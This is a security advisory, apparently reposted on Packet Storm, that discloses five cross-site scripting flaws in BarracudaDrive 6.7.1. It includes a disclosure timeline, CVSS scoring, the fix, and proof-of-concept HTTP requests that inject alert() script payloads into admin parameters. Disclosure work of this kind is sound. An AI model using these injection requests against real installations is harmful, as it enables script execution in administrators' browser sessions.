exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

BarracudaDrive 6.7.1 Cross Site Scripting

BarracudaDrive 6.7.1 Cross Site Scripting
Posted Apr 29, 2014
Authored by Shakeel Bhat | Site secpod.com

BarracudaDrive version 6.7.1 suffers from multiple persistent and reflective cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 0a2ef5f75a8530b4c12f4d929e7c3fa5ef16f61b8b0b3a34dbfee192690742b5

BarracudaDrive 6.7.1 Cross Site Scripting

Change Mirror Download
############################################################################### 
#
# Title : BarracudaDrive Multiple XSS Vulnerabilities
# Author : Shakeel Bhat SecPod Technologies Pvt. Ltd. http://www.secpod.com
# Vendor : http://barracudadrive.com
# Advisory : http://secpod.org/blog/?p=2309
# http://secpod.org/advisories/SecPod_Advistory_BarracudaDrive_6.7.1_Mult_XSS_Vuln.txt
# Software : BarracudaDrive 6.7.1
# Date : 20/03/2014
#
##############################################################################

SecPod ID: 1052 20/03/2014 Issue Discovered
25/03/2014 Vendor Notified
26/03/2014 Vendor Responded
27/03/2014 Vendor Solution
28/04/2014 Advisory Released


Class: Cross-Site Scripting Severity: Medium


Overview:
---------
BarracudaDrive Multiple Reflected (1,3) and Persistent(2,4,5) Cross-site
Scripting Vulnerabilities.


Technical Description:
----------------------

Multiple Reflected and Persistent Cross-Site Scripting vulnerabilities are
present in BarracudaDrive, as it fails to properly sanitize user-supplied
input.

1) Input passed via the 'role' parameter to 'protected/admin/roles.lsp' is not
properly verified before it is returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.

2) Input passed via the 'name' parameter to '/admin/user.lsp' is not
properly verified before it is returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.

3) Input passed via the 'path' parameter in
'/rtl/protected/admin/wizard/setuser.lsp' is not properly verified before it is
returned to the user. This can be exploited to execute arbitrary HTML and
script code in a user's browser session in the context of a vulnerable site.

4) Input passed via the 'host' parameter in '/admin/tunnelconstr.lsp' is not
properly verified before it is returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in the
context of a vulnerable site.

5) Input passed via the 'newpath' parameter in 'protected/admin/wfsconstr.lsp'
is not properly verified before it is returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in the context of a vulnerable site.

The vulnerability has been tested in BarracudaDrive 6.7.1, Other versions may
also be affected.


Impact:
--------
Successful exploitation allows an authenticated attacker to execute arbitrary
HTML and script code in a user's browser session in the context of a
vulnerable site.


Affected Software:
------------------
BarracudaDrive 6.7.1

Tested on,
BarracudaDrive 6.7.1 on Windows OS


References:
-----------
http://secpod.org/blog/?p=2309
http://secpod.org/advisories/SecPod_Advistory_BarracudaDrive_6.7.1_Mult_XSS_Vuln.txt


Proof of Concept:

1) localhost/rtl/protected/admin/roles.lsp?role=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E

2) POST /rtl/protected/admin/user.lsp
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/rtl/protected/admin/user.lsp
Cookie: tzone=--330; z9ZAqJtI=cc48e5f75329a847
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

POSTDATA:
name=<script>alert("xss1")</script>&pwd=erterter&inactive=20&maxUsers=3&recycle=true&pwdl=false&info=

3) POST /rtl/protected/admin/wizard/setuser.lsp
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/rtl/protected/admin/wizard/setuser.lsp
Cookie: tzone=--330; z9ZAqJtI=cc48e5f75329a847
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

POSTDATA
user=abc&password=def&path=<script>alert("xss")</script>

4) POST /rtl/protected/admin/tunnelconstr.lsp
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/rtl/protected/admin/tunnelconstr.lsp?
Cookie: tzone=--330; z9ZAqJtI=cc48e5f75329a847
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

POSTDATA
constr=&host=<script>alert("xss")</script>&port=22&commonports=&pathsub=Add

5) POST /rtl/protected/admin/wfsconstr.lsp
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: tzone=--330; z9ZAqJtI=cc48e5f75329a847
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 101

POSTDATA
basepath=&constr=qw&pathsub=abc&newpath=<script>alert("XSS")</script>&GET=on&PROPFIND=on&readaccess=on


Solution:
-------
Upgrade to BarracudaDrive version 6.7.2


Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = MEDIUM
AUTHENTICATION = SINGLE INSTANCE
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = PARTIAL
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 3.5 (AV:N/AC:M/Au:SI/C:N/I:P/A:N)
CVSS Temporal Score = 3.1
Risk factor = Medium


Credits:
--------
Shakeel Bhat of SecPod Technologies has been credited with the
discovery of this vulnerability.
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close